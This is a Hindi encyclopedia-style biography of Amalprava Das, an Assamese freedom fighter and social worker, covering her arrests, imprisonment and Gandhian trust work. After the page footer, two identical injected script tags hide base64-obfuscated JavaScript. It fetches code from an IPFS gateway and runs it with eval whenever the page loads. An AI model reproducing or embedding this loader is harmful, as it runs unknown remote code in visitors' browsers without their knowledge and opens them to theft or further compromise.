अमलप्रवा दास

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
अमलप्रवा दास
अमलप्रवा दास
पूरा नाम अमलप्रवा दास
जन्म 12 नवंबर, 1911
जन्म भूमि डिब्रूगढ़, असम
मृत्यु 20 दिसम्बर, 1994
मृत्यु स्थान गुवाहाटी, असम
नागरिकता भारतीय
प्रसिद्धि सामाजिक कार्यकर्ता
पुरस्कार-उपाधि पद्म श्री (1954)

जमनालाल बजाज पुरस्कार (1981)

संबंधित लेख महात्मा गांधी, सत्याग्रह आंदोलन, भारत छोड़ो आंदोलन
अन्य जानकारी अमलप्रवा दास को 'कस्तूरबा गांधी राष्ट्रीय स्मारक ट्रस्ट' के लिए धन संग्रह के लिए समिति के सचिव के रूप में नियुक्त किया गया, जिसकी स्थापना 1944 में गांधीजी के अध्यक्ष के रूप में की गई थी।

अमलप्रवा दास (अंग्रेज़ी: Amalprava Das, जन्म- 12 नवंबर, 1911; मृत्यु- 20 दिसम्बर, 1994) एक प्रमुख सामाजिक कार्यकर्ता थीं, जिन्होंने सन 1941 के सत्याग्रह आंदोलन में अपनी भागीदारी के लिए पहचान अर्जित की थी।

  • असम के डिब्रूगढ़ की मूल निवासी अमलप्रवा दास का जन्म 12 नवंबर, 1911 को हुआ था।
  • महात्मा गांधी के मार्गदर्शन में अमलप्रवा दास स्वतंत्रता संग्राम में सक्रिय रूप से शामिल हो गईं।
  • 1941 में उन्हें सत्याग्रह आंदोलन में भाग लेने के लिए गिरफ्तार किया गया। दो साल बाद उन्हें और उनके पिता को भारत छोड़ो आंदोलन के हिस्से के रूप में जेल में डाल दिया गया।
  • उनकी रिहाई के बाद उन्हें 'कस्तूरबा गांधी राष्ट्रीय स्मारक ट्रस्ट' के लिए धन संग्रह के लिए समिति के सचिव के रूप में नियुक्त किया गया, जिसकी स्थापना 1944 में गांधीजी के अध्यक्ष के रूप में की गई थी।
  • सन 1945 में गांधीजी ने अमलप्रवा दास को ट्रस्ट की असम शाखा के प्रतिनिधि के रूप में नामित किया। तब से उन्होंने गांधीजी के रचनात्मक कार्यक्रम का पालन करते हुए रचनात्मक कार्य करने के लिए अपना जीवन समर्पित कर दिया।
  • अमलप्रवा दास की दयालु प्रकृति उनके विभिन्न परोपकारी प्रयासों, विशेष रूप से महिलाओं और बच्चों की पीड़ा को कम करने के उनके प्रयासों के माध्यम से प्रदर्शित होती है।
  • सत्याग्रह आंदोलन में भाग लेने के कारण उनकी गिरफ्तारी ने स्वतंत्रता संग्राम के प्रति उनकी प्रतिबद्धता और अपने विश्वासों के प्रति उनके अटूट समर्पण को प्रदर्शित किया।
  • अमलप्रवा दास की मृत्यु 20 दिसम्बर, 1994 को गुवाहाटी, असम में हुई।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>